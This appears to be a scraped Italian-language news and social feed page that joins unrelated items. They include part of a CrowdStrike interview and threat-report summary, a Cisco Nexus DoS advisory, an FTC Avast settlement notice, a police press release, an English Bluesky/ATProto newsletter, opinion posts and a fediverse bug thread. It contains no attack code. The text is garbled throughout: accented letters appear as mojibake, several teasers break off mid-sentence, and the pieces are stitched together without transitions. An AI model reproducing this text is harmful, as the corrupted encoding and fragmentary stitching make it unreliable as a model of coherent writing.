Lโintegrazione della GenAI nelle strategie di sicurezza moderne offre infatti la possibilitร di ridurre significativamente il divario temporale tra lโidentificazione di una vulnerabilitร e la sua mitigazione. Questo, combinato con approcci tradizionali di sicurezza e expertise umana, rappresenta attualmente la migliore strategia per mantenere una postura di sicurezza robusta di fronte allโevoluzione continua delle minacce Zero Day.
Luca Nilo Livrieri: Charlotte AI rappresenta unโimplementazione di un sistema di intelligenza artificiale generativa con capacitร agentic, che abbiamo integrato nativamente nella piattaforma Falcon di CrowdStrike. Lโarchitettura multi-tenant, cloud-native, dellโassistente รจ stata progettata per operare su scala enterprise, processando petabyte di dati telemetrici in tempo reale attraverso una sofisticata infrastruttura distribuita.
Lโarchitettura di machine learning sfrutta tecniche avanzate di transfer learning da modelli pre-addestrati, con fine-tuning continuo su dati cliente, ensemble methods per migliorare lโaccuracy e sofisticati feedback loop per continuous learning. Il sistema di monitoring fornisce telemetria real-time delle performance, metriche di accuracy e precision, latency tracking e resource utilization monitoring.
Questa implementazione tecnica rappresenta un significativo avanzamento nellโapplicazione di tecnologie AI alla cybersecurity, combinando modelli di machine learning allโavanguardia con architetture distribuite scalabili. La piattaforma evolve continuamente attraverso lโintroduzione di nuove capacitร tecniche e ottimizzazioni delle performance, mantenendo un focus sulla scalabilitร enterprise e sulla sicurezza dei dati.
Lโarchitettura modulare garantisce lโadattabilitร alle minacce emergenti e alle esigenze, sempre in evoluzione, dei team di sicurezza, permettendo lโintegrazione continua di nuovi modelli e capacitร analitiche aiutando nelle fasi di detection, investigation e response.
16-RHC: Luca, la ringraziamo ancora per averci dato la possibilitร di farle questa intervista sul vostro Global Threat Report 2025. Cโรจ qualcosa che vuole aggiungere o che reputa interessante porre allโattenzione dei nostri lettori?
Luca Nilo Livrieri: Si, mi piacerebbe chiudere con qualche raccomandazione e best practices che suggeriamo di seguire:
Proteggere lโintero ecosistema delle identitร adottando MFA resistenti al phishing, implementando politiche di accesso forti e utilizzando strumenti di rilevamento delle minacce alle identitร integrati con piattaforme XDR.
Eliminare i gap di visibilitร cross-domain: modernizzando le strategie di rilevamento e risposta con soluzioni XDR e SIEM di nuova generazione, svolgendo threat hunting proattivo e utilizzando intelligence sulle minacce.
Difendere il cloud come infrastruttura core: utilizzare CNAPP con capacitร CDR, eseguire audit regolari per scoprire configurazioni errate e vulnerabilitร non patchate.
Dare prioritร al patching dei sistemi critici e utilizzare strumenti come Falcon Exposure Management per concentrarsi sulle vulnerabilitร ad alto rischio.
Adottare un approccio basato sullโintelligence, integrare lโintelligence nelle operazioni di sicurezza, avviare programmi di consapevolezza degli utenti e svolgere esercitazioni di tabletop e red/blue teaming.
La Procura Distrettuale di Catania ha coordinato una operazione nazionale contro lo sfruttamento sessuale dei minori online condotta dalla Polizia di Stato. Si tratta di una tra le piรน vaste azioni compiute ad oggi in Italia. Oltre 500 operatori della Polizia Postale hanno eseguito oltre 100 perquisizioni nei confronti di altrettanti indagati, traendo in arresto 34 persone.
I dettagli della operazione saranno illustrati alle ore 10.30 presso la sala stampa della Procura Distrettuale sita in viale XX Settembre n.51.
La Polizia di Stato dimostra ancora una volta la sua determinazione nel contrastare i reati piรน odiosi, ribadendo il proprio impegno nella tutela dei piรน vulnerabili. Le indagini, condotte con strumenti tecnologici avanzati e in stretta collaborazione con organismi internazionali, hanno permesso di smantellare una rete di scambio di materiale pedopornografico, individuando decine di soggetti coinvolti in attivitร illecite a danno di minori.
Questo genere di operazioni rappresenta una delle sfide piรน difficili per gli investigatori, costretti a visionare e analizzare contenuti che hanno un impatto devastante non solo sul piano sociale, ma anche psicologico. Lโesposizione prolungata a materiale di questo tipo richiede una grande forza mentale e un costante supporto per coloro che si occupano di queste indagini, consapevoli che il loro lavoro รจ essenziale per salvaguardare lโinfanzia da pericoli sempre piรน insidiosi.
Nonostante la complessitร e il peso emotivo di questa missione, si tratta di un compito che qualcuno deve assumersi per il bene della comunitร . Lโimpegno incessante della Polizia Di Stato, con il coordinamento delle autoritร giudiziarie, testimonia la volontร di non lasciare spazio allโimpunitร e di colpire duramente chiunque si renda responsabile di crimini cosรฌ gravi.
La lotta alla pedopornografia online continua senza sosta, con lโobiettivo di proteggere i piรน deboli e restituire giustizia alle vittime.
Cisco ha rilasciato un avviso di sicurezza che mette in allerta le aziende e gli amministratori di rete: una vulnerabilitร nei suoi switch della serie Nexus 3000 e 9000 potrebbe consentire ad attaccanti di scatenare una condizione di Denial-of-Service (DoS), causando il riavvio improvviso dei dispositivi e lโinterruzione delle operazioni di rete.
La problematica risiede nel modulo di diagnostica per il monitoraggio dello stato di salute degli switch. Una gestione errata di specifici frame Ethernet consente a un attaccante non autenticato, ma con accesso alla rete locale, di inviare un flusso continuo di frame Ethernet appositamente confezionati per mandare in tilt il dispositivo.
Lโesito? Il riavvio forzato dello switch, con tutte le conseguenze del caso: perdita di connettivitร , interruzione dei servizi e potenziali impatti critici per le infrastrutture aziendali.
Quali modelli sono a rischio?
Gli switch Cisco interessati sono:
Nexus 3100 Series
Nexus 3200 Series
Nexus 3400 Series
Nexus 3600 Series
Nexus 9200 Series (in modalitร standalone NX-OS)
Nexus 9300 Series (in modalitร standalone NX-OS)
Nexus 9400 Series (in modalitร standalone NX-OS)
Cisco ha confermato che questa vulnerabilitร non impatta altri dispositivi come le soluzioni Firepower, la serie MDS e alcuni switch Nexus non elencati.
Come identificare un attacco in corso?
Un exploit riuscito puรฒ provocare il fallimento consecutivo dei test diagnostici โL2ACLRedirect health monitoringโ o โRewriteEngineLoopbackโ sui Nexus 3100 e 3200. Segnali di compromissione possono essere rilevati nei log di sistema con messaggi come:
โL2ACLREDIRECT_LOOPBACK_TEST_FAILโ
โREWRITE_ENGINE_LOOPBACK_TEST_FAILโ
Questi eventi precedono un riavvio forzato del dispositivo con il codice di errore โKernel Panicโ. Tuttavia, Cisco avverte che tali messaggi possono apparire anche per cause non legate alla vulnerabilitร .
Mitigazioni e soluzioni
Cisco ha giร rilasciato aggiornamenti software per risolvere la vulnerabilitร . I clienti con contratti di supporto possono ottenere le patch attraverso i canali di aggiornamento ufficiali.
Per verificare la propria esposizione, Cisco mette a disposizione:
Cisco Software Checker, uno strumento per identificare le versioni vulnerabili del software NX-OS.
Cisco Product Security Incident Response Team (PSIRT), che monitora attivamente le minacce e fornisce indicazioni per la protezione dei dispositivi.
Conclusione
Sebbene al momento non risultino exploit attivi in the wild, questa vulnerabilitร rappresenta un rischio concreto per le infrastrutture di rete aziendali. Un attacco DoS su switch core potrebbe avere conseguenze disastrose, bloccando servizi essenziali e compromettendo la business continuity.
Per questo motivo, gli amministratori di rete devono intervenire immediatamente, verificando le versioni dei propri dispositivi e applicando le patch rilasciate da Cisco. La sicurezza delle reti aziendali non รจ mai una questione da rimandare.
โLa Federal Trade Commission sta inviando moduli di reclamo ai consumatori che hanno acquistato un software antivirus commercializzato in modo ingannevole da Avastโ, viene riportato allโinterno del sito web ufficiale del governo degli Stati Uniti della Federal Trade Commission.
La FTC ha affermato in una denuncia del febbraio 2024 che Avast ha ingannato gli utenti affermando che il suo software avrebbe protetto la privacy dei consumatori bloccando il tracciamento di terze parti, ma non รจ riuscita a informare adeguatamente i consumatori che avrebbe raccolto e venduto i loro dati di navigazione dettagliati e reidentificabili. La FTC ha affermato che Avast ha venduto tali dati a piรน di 100 terze parti tramite la sua sussidiaria, Jumpshot.
Come parte di un ordine di conciliazione con la FTC, Avast รจ stata tenuta a pagare 16,5 milioni di dollari, che saranno utilizzati per risarcire i consumatori. Lโordine vieta inoltre ad Avast di travisare il modo in cui utilizza i dati che raccoglie e di vendere o concedere in licenza dati di navigazione da prodotti a marchio Avast a terze parti per scopi pubblicitari, insieme ad altri requisiti.
La FTC sta inviando notifiche via e-mail a 3.690.813 consumatori che hanno acquistato software antivirus da Avast tra agosto 2014 e gennaio 2020. I consumatori idonei a presentare domanda riceveranno una notifica via e-mail da ora al 7 marzo 2025.
I consumatori idonei possono presentare un reclamo online su www.ftc.gov/Avast. Gli importi dei pagamenti dipenderanno da diversi fattori, tra cui il numero di persone che presentano reclami.
La scadenza per presentare un reclamo รจ il 5 giugno 2025. I consumatori che hanno domande o hanno bisogno di aiuto per presentare un reclamo devono chiamare lโamministratore dei reclami al numero 866-290-0165 o inviare unโe-mail a info@AvastSettlement.com.
Ieri il Ministro Giuseppe Valditara si รจ recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali.
Ieri il Ministro Giuseppe Valditara si รจ recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali.
Qui tutti i dettagli โก๏ธ https://www.mim.gov.
CrowdStrike (NASDAQ: CRWD) ha pubblicato oggi il โGlobal Threat Report 2025โ, che rivela la crescente aggressivitร delle operazioni cyber della Cina, un aumento dellโingegneria sociale basata su GenAI, la ricerca e lโutilizzo delle vulnerabilitร da parte di gruppi sponsorizzati dagli Stati, e un netto incremento degli attacchi privi di malware basati sullโidentitร .
Il report rivela che gli avversari legati alla Cina hanno intensificato del 150% le operazioni cyber sponsorizzate dallo Stato, con attacchi mirati nei settori dei servizi finanziari, dei media, manifatturiero e dellโindustria, che hanno registrato unโimpennata fino al 300%.
Allo stesso tempo, gli avversari di tutto il mondo si stanno avvalendo di tecniche di inganno e manipolazione generate con lโuso dellโintelligenza artificiale, sfruttando credenziali rubate ed eseguendo sempre piรน spesso attacchi cross-domain โ approfittando delle lacune tra endpoint, cloud e identitร โ per eludere i controlli di sicurezza e agire inosservati nellโombra.
Il passaggio a intrusioni prive di malware basate sullโabuso di accessi legittimi, unito a tempi di breakout mai registrati prima, lascia ai difensori pochissimo margine di errore. Per fermare gli attacchi moderni, i team di sicurezza devono eliminare i gap di monitoraggio (punti ciechi nella sicurezza), rilevare i movimenti degli avversari in tempo reale e bloccare gli attacchi prima che si intensifichino, perchรฉ una volta che gli avversari riescono ad entrare รจ giร troppo tardi.
Principali risultati emersi nel Global Threat Report di CrowdStrike
La ricerca di CrowdStrike, che ha analizzato piรน di 250 avversari conosciuti e 140 cluster di attivitร emergenti, rivela:
Lo spionaggio informatico cinese diventa sempre piรน aggressivo: nel 2024 CrowdStrike ha identificato sette nuovi gruppi di avversari legati alla Cina, contribuendo ad un aumento del 150% delle operazioni di spionaggio informatico. I settori piรน critici hanno registrato unโimpennata fino al 300% negli attacchi mirati.
La GenAI potenzia lโingegneria sociale: le tecniche di phishing e impersonificazione basate sullโintelligenza artificiale hanno alimentato un aumento del 442% del voice phishing (vishing) tra il primo ed il secondo semestre del 2024. Gruppi di eCrime avanzati come CURLY SPIDER, CHATTY SPIDER e PLUMP SPIDER hanno sfruttato lโingegneria sociale per rubare credenziali, stabilire sessioni remote di supporto help desk ed eludere il rilevamento.
LโIran utilizza la GenAI per individuare e sfruttare le vulnerabilitร : nel 2024, gli attori legati allโIran hanno sperimentato in misura crescente la GenAI per la ricerca di vulnerabilitร , lo sviluppo di exploit e la gestione delle patch sulle reti nazionali, in linea con le iniziative governative sullโAI.
Dallโintrusione allโaccesso โ Boom di attacchi senza lโutilizzo di malware: il 79% degli attacchi per ottenere lโaccesso iniziale avviene ormai senza lโuso di malware, mentre gli annunci di access broker sono aumentati del 50% su base annua. Gli avversari sfruttano credenziali compromesse per infiltrarsi nei sistemi come utenti legittimi, muovendosi lateralmente senza essere rilevati attraverso attivitร dirette di tipo hands-on keyboard.
Le minacce interne continuano a crescere: lโavversario DPRK-nexus il gruppo FAMOUS CHOLLIMA, legato alla Corea del Nord (DPKR) รจ stato responsabile di 304 attacchi scoperti nel 2024. Il 40% di questi incidenti ha riguardato operazioni di minaccia interna, con gli avversari che si sono infiltrati nei sistemi aziendali spacciandosi per dipendenti legittimi al fine di ottenere accesso ai sistemi e condurre attivitร malevole.
Tempo di breakout a velocitร record: il tempo medio di breakout negli attacchi eCrime รจ sceso a 48 minuti, con il caso piรน veloce registrato a 51 secondi, lasciando ai difensori pochissimo tempo per reagire.
Ambienti cloud sotto assedio: le intrusioni cloud di nuova origine e non attribuite a specifici attaccanti sono aumentate del 26% su base annua. Lโabuso di account validi รจ la principale tecnica di accesso iniziale e rappresenta il 35% degli incidenti cloud nel primo semestre 2024.
Le vulnerabilitร non corrette restano un obiettivo chiave: il 52% delle vulnerabilitร osservate era legato allโaccesso iniziale, evidenziando la necessitร critica di proteggere i punti di ingresso prima che gli avversari riescano a stabilire una presenza persistente nei sistemi.
โIl cyber spionaggio cinese, sempre piรน aggressivo, unito alla rapida diffusione di strumenti di inganno basati sullโintelligenza artificiale, sta costringendo le organizzazioni a ripensare il proprio approccio alla sicurezzaโ, ha dichiarato Adam Meyers, Head of Counter Adversary Operations di CrowdStrike. โGli avversari sfruttano le lacune nellโidentitร , fanno leva sul social engineering e si muovono tra i diversi domini senza essere individuati, rendendo inefficaci le difese tradizionali. Per fermare le violazioni รจ necessaria una piattaforma unificata, basata su intelligence e threat hunting in tempo reale, che metta in correlazione identitร , cloud e attivitร degli endpoint per eliminare i punti ciechi in cui si nascondono gli avversariโ.
CrowdStrike ha rivoluzionato la cybersecurity con un approccio basato sugli avversari grazie alla piattaforma CrowdStrike Falconยฎ, che rappresenta il gold standard della sicurezza informatica, offrendo protezione potenziata dallโAI, threat intelligence in tempo reale e threat hunting avanzato per proteggere identitร , cloud ed endpoint. Grazie allโIntelligenza Artificiale comportamentale e al machine learning addestrati sulla base della threat intelligence e di trilioni di eventi di sicurezza, CrowdStrike offre una protezione in tempo reale contro le minacce avanzate, fornendo visibilitร e protezione complete lungo lโintero ciclo di vita dellโattacco.
Visita lโAdversary Universe di CrowdStrike per conoscere la fonte online completa sugli avversari.
Ascolta il podcast Adversary Universe per ottenere approfondimenti sugli attori delle minacce e raccomandazioni per amplificare le pratiche di sicurezza.
Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: โcan ATProto scale downโ? Next week will be focused again on Bluesky and itโs surrounding ecosystem of media apps. The News Constellation is a project that recently released that provides a database of [โฆ]
Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: โcan ATProto scale downโ? Next week will be focused again on Bluesky and itโs surrounding ecosystem of media apps.
The News
Constellation is a project that recently released that provides a database of all backlinks in the entire network. Constellation now has a database of over 1.2 billion links, and an accompanying website with statistics to slice through. The Constellation API is now also getting integrated into multiple PDS browsers, both PDSls and atp.tools show backlinks to the ATProto records now. This puts PDS browsers more into their own specific place on the network: not a full AppView, but more than just a way to view the content of a PDS.
Bluesky PBC has put out a new proposal for ATProto, Sync 1.1. The proposed update concerns the relays, and the validation work they do. As part of the Authenticated Transfer, which ATProto is named after, relays validate every event on the firehose. This validation process currently requires a relay to store the entire repo, which can take up a lot of space. This is one of the aspects that make hosting a relay more expensive. The proposed update changes the way validation works, which allows a relay to validate the integrity of all the data going through the firehose without having to store the entire repo. Bluesky engineer Devin Ivy provides an explainer thread on how this works here. This update makes it much more feasible for people to self-host relays.
Another proposal by Bluesky PBC is for moderation routing report. The new feature allows labelers to select which type of report they want to receive. A common problem that labelers currently face is that users tend to receive reports that are not relevant for their specific labeling service, which causes them unnecessary extra work, as well as getting unnecessarily exposed to awful content. The new proposed update allows labelers to opt-out of specific reporting categories. Bluesky engineer Bryan Newbold says Bluesky PBC is currently working on implementing the feature, aiming to ship it soon.
In Other News
Bluesky has posted some new job vacancies, and they are now hiring a System Integrity Engineer, Product Designer and Senior Trust and Safety Lead. Both the System Integrity Engineer and Trust and Safety Lead indicate that Bluesky is expanding their Trust and Safety work: both of these jobs are newly created positions, with the engineering position explicitly focused on moderation systems and regulatory compliance.
Some podcasting news: two podcasting apps, Transistor and TrueFans, both added support for displaying Bluesky comments on the podcast episode page. TrueFans also supports fediverse comments, so that a podcast episode page can display comments and reactions from both networks.
Bluesky engineer Jaz wrote an article about โlossyโ timelines. The summary is that to maintain performance, the home timelines of accounts that follow more than 4k accounts will not always see all posts on the timeline.
Upcoming ATProto short-form video platform Spark shared their outline on some of the limits theyโll set. Spark aims to allow videos of 300 MB or 3 minutes long (compared to Blueskyโs 50MB or 1 minute), and 12 files for image posts (5MB each). This is part of the reason why Spark is not using Blueskyโs lexicon, instead developing their own. Setting these limits higher will also require Sparks to provide their own PDSes, as the file size limit is set by the Bluesky PDS. Hosting video is expensive, and it is not yet clear how Spark will finance this.
A short tutorial on how to publish lexicon verification. The first verified lexicons are now starting to show up on lexidex.
Roomy has posted a deep dive on their tech stack, how they are combining ATProto and Automerge to build public chatrooms.
Web browser Opera adds Bluesky integration, allowing you to more easily doom scroll in the sidebar of the browser.
Bluesky video client Skylight is now available in beta on Android, after Skylight had trouble with Google to get the Android beta approved.
Some events: Feed builder Graze will hold a meetup in New York this Friday the 28th, and at SXSW (March 10th, Austin) there will be Bluesky meetup.
The Links
An interview with Game Industry Labeler developer Trazy on how builds a community of thousands of game devopers on Bluesky.
A guide (in Japanese) on how to upload videos using Bluesky API (XRPC)
An interview with Bluesky CEO Jay Graber at Knight Media Forum.
A podcast interview with the developer of the ATProto art platform Pinksea
Thatโs all for this week, thanks for reading! If you want more analysis, you can subscribe to my newsletter. Every week you get an update with all the articles of this week, as well as extra analysis not published anywhere else. You can subscribe below, and follow this blog @fediversereport.com and my personal account @laurenshof.online on Bluesky.
Il presidente statunitense ha trattato con grande sufficienza quello ucraino, accusandolo di voler rischiare una Terza guerra mondiale, tra le altre cose
Ricordo quella mattina di ottobre del 1998 a Milano, all'altezza di viale Bligny, quando io e il Pierre fermi al semaforo, veniamo avvicinati da un'auto con sopra Leone e due giovani ragazze. Guarda il nostro cabriolet bianco, con la capote aperta, si alza in piedi e dice:"Permettete che ci piscio dentro?"
Magari un'altra volta.
"Trenta chili" Leone di Lernia e il Complesso l'Universo (1968)
chissร come mai zelensky ce l'ha cosรฌ tanto con putin... neppure lo avesse invaso... ha fatto solo un'operazione speciale. per trump invece non era neppure una questione di pace tra ucraina e russia, ma solo affari. le famose "terre rare". qualcuno dica a trump che l'ucraina ha si minerali di valore ma non terre rare. e comunque non cosรฌ tante come pensa lui. se non fosse cosรฌ tragica ci sarebbe da ridere sia di trump che di putin. i grandi perculatori. il secondo convinto di essere stato aggredito dalla nato, il primo interessato ad affari con un popolo martoriato. ucraina come fascia di gaza a quanto pare. e pensare che prima dell'invasione ucraina la nato era data per finita... un retaggio del passato. poi creduta rinata, almeno da un paio di paesi confinanti con la russia. e con trump di nuovo morta. tutto cambia. eternamente. se la nato non esiste piรน, possiamo tornare tutti a casa, grande putin? e ognuno a sfondarsi di spese militari per il prossimo futuro e fregandosene del cambiamenti climatico... questi sono i saggi leader dell'epoca moderrna? quelli "concreti"? se non altro sia putin che trump amano il petrolio. chissร se ci fanno pure bagni di salute dentro. altro che inseguire orsi: le paludi di petrolio. c'รจ la lotta nel fango, e c'รจ la lotta nel petrolio.
(Stuart Kauffman "Reinventare il sacro" Codice Edizioni)
Qui sulla Terra, una buona metร di noi crede in un Dio creatore. Qualche altro miliardo crede in un Dio abramitico soprannaturale, e alcuni altri negli antichi dei indรน. Tradizioni di saggezza, come il buddismo, sono spesso senza Dio. Circa un miliardo di persone รจ laico, ma privo di spiritualitร e semplice consumatore materialista in una societร laica. Se c'รจ qualcosa a cui noi laici teniamo รจ l'umanesimo. Ma l'umanesimo, in un'accezione ristretta, รจ troppo esile per nutrirci come agenti umani nel vasto universo che in parte co-creiamo. Abbiamo bisogno, credo, di un dominio per la nostra vita, ampio come la realtร . Se la metร di noi crede in un Dio soprannaturale, la scienza non confuterร quella fede. Abbiamo bisogno di un luogo per la nostra spiritualitร , e un Dio creatore รจ uno di quei luoghi. Siamo noi, sostengo, ad aver inventato Dio, il piรน potente dei nostri simboli. E' una nostra scelta la saggezza con cui usare il nostro simbolo per orientare la nostra vita e la nostra civiltร . Credo che possiamo reinventare il sacro. Possiamo inventare un'etica globale in uno spazio condiviso, uno spazio sicuro per noi tutti, dove Dio va inteso come creativitร naturale nell'universo.
questa cosa non ha alcun senso... considerando che il costo di una polizza si bassa sulla statistica di quanto costa un evento per l'assicurato e quale sia la probabilitร che un evento generico si realizzi, in uno specifico arco di tempo. ora sappiamo che l'incidenza di questo tipo di eventi, diventato "frequente" negli ultimi anni, e pure destinato a salire nell'arco dei prossimi anni, facciamo qualche calcolo
opzione 1) un'assicurazione che mettiamo debba "contabilizzare il rischio" di dover rimborsare il 25% degli assicurati entro i prossimi 2-3 anni, dovrรฒ far pagare un premio che รจ l'ammontare dei danni programmati per i prossimi anni + un guadagno. e in questo caso il costo dell'assicurazione sarร molto salato per le imprese. alcune potrebbero dover chiudere per l'impossibilitร di pagare. quale azienda puรฒ assumersi il rischio statistico di perdere l'intera struttura ogni 2-3 anni?
opzione 2) il rischio รจ cosรฌ elevato che nessuna assicurazione accetterร di stipulare polizze del genere, perchรฉ anti-economiche. perchรฉ eventi di questo genere sono diventati la norma e non piรน l'eccezione.
per capire il problema basti pensare al fatto che sono giร sparite le polizze di protezione cristalli sulle auto, a causo della maggior incidenza statistica di questo genere di danno.
opzione 3) magari per legge le aziende assicurative saranno costrette a offrire le polizze a prezzi fattibili, e in questo caso alla prima calamitร assisteremo al fallimento dell'assicurazione e quindi a nessun pagamento...
il fatto che secondo l'ottica di qualcuno le assicurazioni sono ladre ed hanno tanti soldi, non significa che offrire una garanzia del genere sia comunque fattibile, di fronte al futuro che ci attende poi. e neppure pare che il mondo voglia davvero preoccuparsi dei cambiamenti climatici... ditelo a cina, brasile, india, usa e urss....
a chiunque scaricherai la patata bollente alla fine, non sarร in grado di pagare. che sia l'azienda, un'assicurazione, o lo stato. e detti questi 3 non mi viene in mente nessun altro che possa pagare.
Polizze catastrofali, รจ stato pubblicato in Gazzetta Ufficiale del 27 febbraio il decreto attuativo. Confermata la scadenza del 31 marzo 2025 per le imprese. Assicurazioni giร in essere da adeguare
Occhi puntati su Londra questa domenica per il vertice sulla Difesa europea indetto dal primo ministro britannico, Keir Starmer, al rientro dal suo incontro con Donald Trump alla Casa Bianca. Invitati a partecipare non solo istituzioni e Paesi membri dellโUe, ma anche Norvegia, Turchia e vertici
@Informatica (Italy e non Italy ๐) La nuova truffa sul licenziamento, capace di sfruttare il timore della perdita del posto di lavoro, รจ molto piรน insidiosa e redditizia delle truffe che promettevano ricche opportunitร di lavoro. Ecco come mitigare il rischio L'articolo La truffa del finto licenziamento: come difendersi proviene da Cyber
@Informatica (Italy e non Italy ๐) Il ritiro dell'AI Liability Directive, la proposta di modifica per lโassetto della regolazione della responsabilitร civile per danni derivanti dallโuso dellโintelligenza artificiale, ha delle conseguenze. Ecco quali L'articolo Responsabilitร
@Informatica (Italy e non Italy ๐) Da un monito di Banca dโItalia emerge che le imprese che non dimostrano un adeguato livello di sicurezza informatica rischiano di vedersi negare lโaccesso ai finanziamenti. Ecco perchรฉ servono audit di cyber security per ottenere
@Informatica (Italy e non Italy ๐) Polizia di Stato e Aruba per la prevenzione e il contrasto dei crimini informatici, lโaccordo Polizia di Stato e Aruba hanno sottoscritto una convenzione per potenziare lo scambio
Nel suo film del 2007 โLa giusta distanzaโ, Carlo Mazzacurati narra la vicenda di un giovane apprendista giornalista, che non riesce, in merito ad un fatto di cronaca, a mantenere la โgiusta distanzaโ dai fatti, come gli ha suggerito il suo mentore. Ovvero non riesce ad approfondire abbastanza quel che accade per averne una visione imparziale, il piรน possibile corretta e scevra da opinioni ed idee personali: quello che, nella teoria, ogni giornalista dovrebbe tendere a fare nel suo mestiere.
In Italia puรฒ essere portato ad esempio di come questo modo di operare sia, nei fatti, ignorato del tutto o quasi. Da parte di molte testate giornalistiche e di TG d'ogni canale รจ รจ un muoversi nelle direzioni piรน disparate: dapprima per rimanere โsul pezzoโ e, passata la fase di picco a livello di notizia, per estendere all'infinito una serie di tematiche, perlopiรน allarmiste e con un alto tasso di sensazionalismo, fino a coprire intere giornate di trasmissione.
E' anche un po' il limite, per esempio, dei canali โAll Newsโ, dove per ventiquattro ore al giorno si trasmette ogni sorta di dettaglio, di accadimento, di vocio per coprire la giornata intera. Reiterando all'infinito le stesse cose (non puรฒ accadere qualcosa di clamoroso ogni ora), si finisce con il โcaricareโ la notizia fino allo spasimo, spesso inserendo note di colore che rendono la narrazione volutamente altisonante, pervasiva, angosciante. Una estremizzazione indotta per mantenere attento lo spettatore.
Chiaramente รจ una maniera d'operare affatto corretta e per quanto giornalisti ed opinionisti lo neghino, appare abbastanza chiaro che รจ un mare in cui a loro piace nuotare. Possiamo comprendere che sia piรน semplice fare cosรฌ che mantenere quella distanza di cui sopra: si rischia, magari, la noia o una maniera troppo blanda di porgere le notizie e molte persone amano, inconsciamente o meno, il clamore e la chiacchiera, a discapito di coloro che, invece, vorrebbero leggere o sentire semplicemente ciรฒ che รจ successo, senza fronzoli.
D'altro canto ognuno puรฒ essere un amplificatore dei fatti: basta un account su โFacebookโ o su โXโ dove riprendere e commentare ogni cosa venga detta, magari distorcendo ulteriormente le cose, caricandole con opinioni personali (cui si ha diritto) e facendo rimbalzare tutto ovunque. Una sorta di cerchio infinito in cui la sconfitta รจ l'informazione di qualitร , quella cui dovrebbero sempre ambire tutti. Sarebbe un freno per un mondo giร sovraccarico di input, dove siamo โbombardatiโ senza sosta, senza tregua di cose che ci sentiamo obbligati a seguire.
Un corto circuito permanente d'attenzione e di sovraccarico mediatico. E come ogni cosa portata all'eccesso, รจ un danno. Cui, temo, non si possa piรน porre rimedio, se non con la volontร personale di distaccarsi da questa narrazione sbilanciata, reinserendo nel proprio modo di informarsi una quanto mai necessaria dose di distacco e di ragionamento. Cose difficili da fare, faticose, ma non impossibili.
Gli scritti sono tutelati da โCreative Commonsโ (qui)
Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com
@Notizie dall'Italia e dal mondo Enormi manifestazioni in Grecia nel giorno dello sciopero generale proclamato contro il governo, accusato di aver insabbiato le indagini contro i responsabili del disastro ferroviario di Tempes L'articolo GRECIA: sciopero generale e manifestazioni oceaniche contro
Durante lโaudizione di conferma davanti alla Commissione per i servizi armati del Senato Usa, John Phelan, indicato da Donald Trump come prossimo segretario alla Marina (SecNav), ha esposto quelle che saranno le sue prioritร come nuovo capo della US Navy e del Corpo dei Marine. Ridurre i
@Politica interna, europea e internazionale Nessun inciucio tra Partito Democratico e Fratelli dโItalia e nessuna crociata contro Elon Musk nรฉ tantomeno pregiudizi verso il servizio Starlink di SpaceX ma solo unโattenzione alla salvaguardia della sicurezza nazionale e della capacitร
8 marzo 2025, dalle ore 10:00 alle ore 18:00 presso lโAula Malagodi della Fondazione Luigi Einaudi Introduce Lucetta Scaraffia Contro la strumentalizzazione del diritto, di Silvia Niccolai Maternitร fra parto, aborto e gravidanza per altri, di Adriana Cavarero Le difficili alleanze tra i femminismi contemporanei, di Olivia
Jonas โ
in reply to ๐ป๐๐๐๐ ๐ฆ๐ง๐ปโ๐ป๐ • • •Btw, is it intended that Raccoon is not restorable with Neo Backup?
After restore it crashes after launch. Not sure why, didn't have time to have a look at logcat.
๐ป๐๐๐๐ ๐ฆ๐ง๐ป๐ป๐ likes this.
RaccoonForFriendica reshared this.
๐ป๐๐๐๐ ๐ฆ๐ง๐ปโ๐ป๐
in reply to Jonas โ • •like this
Jonas โ likes this.
reshared this
RaccoonForFriendica reshared this.
Jonas โ
in reply to ๐ป๐๐๐๐ ๐ฆ๐ง๐ปโ๐ป๐ • • •RaccoonForFriendica reshared this.
Jonas โ
in reply to Jonas โ • • •๐ป๐๐๐๐ ๐ฆ๐ง๐ป๐ป๐ likes this.
RaccoonForFriendica reshared this.
๐ป๐๐๐๐ ๐ฆ๐ง๐ปโ๐ป๐
in reply to Jonas โ • •Ok seen it. It is due to encrypted shared preferences (used to store on device your auth token). It fails to open after you restore the app, probably due to failure to decrypt them because the key changes when you reinstall it. I'll investigate more to see if there are workarounds.
Seemingly it is a known issue.
Jonas โ likes this.
RaccoonForFriendica reshared this.
Jonas โ
in reply to ๐ป๐๐๐๐ ๐ฆ๐ง๐ปโ๐ป๐ • • •RaccoonForFriendica reshared this.